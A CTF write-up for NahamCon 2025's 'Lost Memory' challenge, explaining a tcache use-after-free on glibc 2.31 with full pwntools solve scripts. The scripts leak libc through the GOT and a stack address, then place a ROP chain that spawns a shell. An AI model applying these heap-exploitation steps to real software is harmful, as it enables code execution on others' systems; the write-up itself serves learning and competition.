Lost & Found Memory

anthonyjs

2025-05-15

These two challenges from Nahamcon CTF 2025 will abuse tcache with Use-After-Free primitives to hijack control flow of a program without PIE and a program with PIE.

Lost Memory

anthonyjs@frosty:~$ checksec --file lost_memory 
[*] '/home/anthonyjs/lost_memory'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x3fe000)
    RUNPATH:    b'./'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

Quick look at protections here reveals that the GOT is writable and there is neither PIE or canaries. A quick peek at the libc that the binary was built with also reveals that we are looking at libc 2.31.

Reverse Engineering

Very quickly we can scout that this is a standard CRUD application:

void menu(void)

{
  puts("1. Allocate Memory");
  puts("2. Write to Memory");
  puts("3. Select Index");
  puts("4. Free Memory");
  puts("5. Store Flag Return Value");
  puts("6. Exit");
  puts("Enter your choice:");
  return;
}

Important things to check here are:

How many chunks can we allocate?
How big can we allocate?
What happens when we free a chunk?
Can we mess with a chunk after its been freed?

For allocating:

puts("What size would you like?");
fgets(&input,256,stdin);
size = atol(&input);
memset(&input,0,0x100);
uVar1 = memIndex;
if (256 < size) break;
pvVar2 = malloc(size);
*(void **)(ptr + uVar1 * 8) = pvVar2;
*(int *)(ptrSize + memIndex * 4) = (int)size;
puts("Allocated memory");

We see that we can allocate up to 256 bytes maximum.

For selecting an index:

printf("Select an index to write to (0 - %d)\n ",9);
fgets(&input,0x100,stdin);
memIndex = atol(&input);
memset(&input,0,0x100);
if (9 < memIndex) {
  puts("Invalid index");
  return;
}

We see that we can only have up to 9 allocations.

Now knowing that 256 is our max size and we can only maintain 9 allocations at a time, its pretty obvious were going to be in tcache land.
You’ll also notice here that no checks on if the index is null (unallocated) are taken.

if (choice == 2) {
  puts("What would you like to write?");
  fflush(stdin);
  fgets(&input,256,stdin);
  if (input == '\0') {
    puts("No input provided");
    return;
  }
  puts("Writing to memory...");
  memcpy(*(void **)(ptr + memIndex * 8),&input,(long)*(int *)(ptrSize + memIndex * 4));
  printf("ptr[memIndex] = %s\n",*(undefined8 *)(ptr + memIndex * 8));
  printf("input = %s\n",&input);
  memset(&input,0,0x100);
}
...
else if (choice == 4) {
  if (*(long *)(ptr + memIndex * 8) == 0) {
    puts("No memory to free");
  }
  else {
    puts("Freeing memory...");
    free(*(void **)(ptr + memIndex * 8));
  }
}

We do see a check here when freeing to avoid freeing a null ptr, but after freeing a valid pointer it is never set to null so this case will only ever be hit when the index was never initialized.

We now know that we have a valid Use-After-Free primitive and we do not have PIE or Safe Linking.

We can turn this into an arbitrary allocation primitive very easily.

typedef struct tcache entry {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
} tcache_entry;

This is what a tcache entry looks like when the chunk is freed and placed into tcache. Having two chunks in tcache will look something like this:

chunk_two {
    struct tcache_entry *next = &chunk_one;
    struct tcache_perthread_struct *key = &tcache_struct;
};

chunk_one {
    struct tcache_entry *next = NULL;
    struct tcache_perthread_struct *key = &tcache_struct;
};

Now when you allocate the same size of said chunk, you will be returned the first item in the list (here it would be chunk_two). The next item in the list would then become the next pointed to chunk given by chunk_two. But we already established that we could change a chunk after it was freed. This will allow us to overwrite what that next pointer is and then when we call malloc(size) again, we will be returned the address that we fabricated.

This will be useful in leaking libc for us and for allocating somewhere for us to throw a rop chain later on.

Exploitation

from pwn import *

bin = './lost_memory'
elf = context.binary = ELF(bin)
libc = elf.libc

p = process(bin)

def malloc(size):
    p.sendlineafter(b':', b'1')
    p.sendlineafter(b'?', str(size).encode())

def write(payload):
    p.sendlineafter(b':', b'2')
    p.sendlineafter(b'?', payload)

def slot(offset):
    p.sendlineafter(b':', b'3')
    p.sendlineafter(b'9)', str(offset).encode())

def free():
    p.sendlineafter(b':', b'4')

malloc(16) # slot 0 = 16

slot(1)
malloc(16) # slot 1 = 16

free() # slot 1 freed
slot(0)
free() # slot 0 freed

# overwrite slot 0 to overwrite next ptr
write(p64(elf.got['free']-0x10))

slot(3)
malloc(16) # getting to that next ptr

# next 16 malloc will return the address of elf.got['free']-0x10 
slot(4)
malloc(16)
write(b'A'*16) # fill the 0x10 so we can print using %s

p.recvuntil(b'A'*16)
libc.address = u64(p.recv(6) + b'\x00'*2) - libc.sym['free']
log.info(hex(libc.address))

The next challenge is figuring out where we want to write our rop chain in order to get control flow. We know we can allocate wherever we want, but where do we want to?

Luckily for us, this feature in the code leaks a stack address:

else {
  if (choice != 5) {
    if (choice == 6) {
      puts("Exiting...");
      return;
    }
    puts("Invalid choice");
    return;
  }
  puts("Storing flag return value");
  **(long **)(ptr + memIndex * 8) = (long)local_20;
  printf("Stored return value: %p\n",**(undefined8 **)(ptr + memIndex * 8));
  printf("Stored return value: %p\n",local_20);
}

From here we can take this stack address and calculate the return address on the stack. From there we simply place our rop chain and get the function to return.

Full solve script:

from pwn import *

bin = './lost_memory'
elf = context.binary = ELF(bin)
libc = elf.libc

p = process(bin)

def malloc(size):
    p.sendlineafter(b':', b'1')
    p.sendlineafter(b'?', str(size).encode())

def write(payload):
    p.sendlineafter(b':', b'2')
    p.sendlineafter(b'?', payload)

def slot(offset):
    p.sendlineafter(b':', b'3')
    p.sendlineafter(b'9)', str(offset).encode())

def free():
    p.sendlineafter(b':', b'4')

malloc(16) # slot 0 = 16

slot(1)
malloc(16) # slot 1 = 16

free() # slot 1 freed
slot(0)
free() # slot 0 freed

# overwrite slot 0 to overwrite next ptr
write(p64(elf.got['free']-0x10))

slot(3)
malloc(16) # getting to that next ptr

# next 16 malloc will return the address of elf.got['free']-0x10 
slot(4)
malloc(16)
write(b'A'*16) # fill the 0x10 so we can print using %s

p.recvuntil(b'A'*16)
libc.address = u64(p.recv(6) + b'\x00'*2) - libc.sym['free']
log.info(hex(libc.address))

# goal now is to leak stack using that weird thing
# then write rop chain in return ptr

p.sendlineafter(b':', b'5')
p.recvuntil(b'return value: ')
rip = int(p.recvuntil(b'\n', drop=True), 16) + 0x30

# now lets do the whole arb allocation again
slot(5)
malloc(256) # slot 5 = 256

slot(6)
malloc(256) # slot 6 = 256

free() # slot 6 freed
slot(5)
free() # slot 5 freed

# overwrite slot 0 to overwrite next ptr
write(p64(rip))

slot(7)
malloc(256) # getting to that next ptr

# next 256 malloc will be arbitrary 
slot(8)
malloc(256)

rop = ROP(libc)
rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
sh = next(libc.search(b"/bin/sh\x00"))
system = libc.sym['system']

write(p64(rdi+1) + p64(rdi) + p64(sh) + p64(system))
p.sendlineafter(b':', b'6')
p.interactive()